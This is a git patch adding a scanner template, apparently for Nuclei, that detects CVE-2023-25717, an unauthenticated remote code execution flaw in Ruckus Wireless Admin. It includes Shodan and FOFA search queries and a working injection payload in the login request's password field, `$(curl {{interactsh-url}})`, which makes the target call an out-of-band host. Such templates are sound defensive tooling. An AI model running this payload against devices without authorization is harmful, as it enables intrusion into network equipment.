From 0450d1224fb45d442cac03ca478e204ceccbd3c9 Mon Sep 17 00:00:00 2001 From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com> Date: Tue, 9 May 2023 18:05:28 +0530 Subject: [PATCH] Create CVE-2023-25717.yaml --- http/cves/2023/CVE-2023-25717.yaml | 35 ++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/cves/2023/CVE-2023-25717.yaml diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml new file mode 100644 index 0000000000..f7108f5bd9 --- /dev/null +++ b/http/cves/2023/CVE-2023-25717.yaml @@ -0,0 +1,35 @@ +id: CVE-2023-25717 + +info: + name: Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. + author: parthmalhotra, pdresearch + severity: critical + description: | + Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request. + reference: + - https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ + - https://support.ruckuswireless.com/security_bulletins/315 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-25717 + cwe-id: CWE-94 + epss-score: 0.00671 + cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + shodan-query: title:"ruckus wireless" + fofa-query: title="ruckus wireless" + tags: cve,cve2023,ruckuswireless,trending + +http: + - method: GET + path: + - "{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0" + + matchers: + - type: word + part: interactsh_protocol + words: + - "http"